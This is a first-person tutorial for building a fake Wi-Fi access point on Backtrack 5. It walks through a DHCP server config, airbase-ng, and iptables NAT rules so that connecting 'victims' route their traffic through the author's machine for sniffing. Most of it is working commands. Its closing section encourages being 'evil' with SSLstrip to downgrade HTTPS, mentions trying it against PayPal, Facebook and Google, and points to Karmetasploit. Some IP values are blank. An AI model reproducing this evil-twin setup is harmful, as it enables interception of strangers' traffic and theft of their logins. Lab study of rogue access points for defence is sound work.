Create Wifi NAT

The purpose of this tutorial was to create a fake access point in my lab in order to redirect the connecting devices traffic through it and analyze the traffic.

I used my Lenovo x230 notebook with the built-in wifi card to connect to my router. I used a second USB wifi card to act as a fake AP. I used Backtrack 5 R3 x64 Gnome operating system.

My cable router IP address is:

My network interface connected to the router is: wlan0

My fake AP IP address will be:

My network interface which will be the fake AP: wlan2

We need several things in order to perform the task:

  • Fake wifi access point
  • DHCP server to provide IP to the victims
  • iptables rules to NAT traffic

Set up the DHCP server

Get the server package from repository, stop it after install, save a backup of original configuration and create our own config file:

apt-get install dhcp3-server
/etc/init.d/dhcpd stop
cd /etc/dhcp3/
cp dhcpd.conf dhcpd.conf.orig
nano /etc/dhcp3/dhcpd.conf

Put the following contents into the file:

default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
#log-facility local7;
subnet netmask {
  option subnet-mask;
  option broadcast-address;
  option routers;
  option domain-name-servers;

I also like to remove DHCP from autostart:

update-rc.d -f dhcp3-server remove

Now we are ready to go. First we need to restart our wireless adapter in monitor mode. To do so, we first stop the interface, then use airmon-ng to restart it in monitor mode. Then, we utilize airbase-ng to start a new network. 

airmon-ng start wlan2
airbase-ng -e "FreeWifi" -c 9 mon0

-e = name of access point
-c 9 = listen on channel 9
mon0 = Our virtual monitor mode interface

Airbase-ng creates an interface named "at0" tap so you have to configure it and set the mtu size.

ifconfig at0 up netmask
ifconfig at0 mtu 1400

Now let's empty leases and start the DHCP server:

> /var/lib/dhcp3/dhcpd.leases
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.conf at0

You can check if the DHCP is running with the following command:

ps aux | grep dhcpd

Result should be something like this:

OUTPUT: dhcpd     2956  0.0  0.0  19632  3008 ?        Ss   11:00   0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf mon0

Now in a new window I like to see the leased IP addresses:

tail -f /var/log/messages|grep dhcpd

!!!If you don't want to flush your firewall, just skip the flash commands section.!!!

Run the following commands to flush all ip-tables and setup new ones.

iptables -F
iptables -t nat -F
iptables -P INPUT ACCEPT

Add iptables rules to forward and masquerade the traffic. The second rule is just for safety, you can leave it out.

iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o at0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i at0 -o wlan0 -j ACCEPT

Last step is to enable ipv4 forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

Basically we are done. You can start a sniffer of your choice (wireshark, tcpdump, dsniff...) and start having fun.

Below this point it is going to be mad...don't try this at home:)

If you want to be so bad, that you want to change the victims' HTTPS traffic to HTTP, you can use the famous SSLSTRIP tool. Frankly it did not work for me for facebook and google, but worked with paypal...before it froze again and again...maybe I need to spend some more time looking at the issue...

To be evil, follow the SSL Strip instructions:

SSL Strip

To be evil, follow the Karmetasploit instructions:

Karmetasploit - metasploit capture traffic